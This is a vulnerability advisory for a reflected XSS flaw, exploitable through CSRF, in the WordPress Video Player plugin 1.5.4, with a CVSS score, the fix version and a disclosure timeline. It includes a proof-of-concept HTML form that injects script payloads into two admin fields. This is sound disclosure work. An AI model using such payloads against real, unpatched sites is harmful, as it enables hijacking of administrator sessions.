WordPress Video Player 1.5.4, Reflected XSS

The ‘Tags’ section of ‘WordPress Video Player’ under WordPress Administration contains a two fields that are vulnerable to a Reflected XSS attack. This is due to the fact that the value passed through to these fields are not encoded prior to output. There is also no nonce on this page, which means the XSS can be triggered via CSRF.

Homepage

https://wordpress.org/plugins/player/

CVSS Score

4.3

CSSS Vector

(AV:N/AC:M/Au:N/C:P/I:N/A:N)

Attack Scope

remote

Authorization Required

None

Mitigation

Update to version 1.5.5.

Proof of Concept

<form action="http://localhost/wp-admin/admin.php?page=Tags_Spider_Video_Player" method="post" enctype="application/x-www-form-urlencoded">
  <input type="hidden" name="asc_or_desc" value='"><script>alert(1)</script>'/>
  <input type="hidden" name="order_by" value='"><script>alert(2)</script>'/>
  <input type="submit" value="Submit"/>
</form>

Timeline

  • 2015-01-15: Discovered
  • 2015-01-15: Vendor notified
  • 2015-01-16: Vendor responded
  • 2015-01-16: Version 1.5.5 released – issue resolved
  • 2015-01-16: CVE Requested
  • 2015-02-02: Advisory released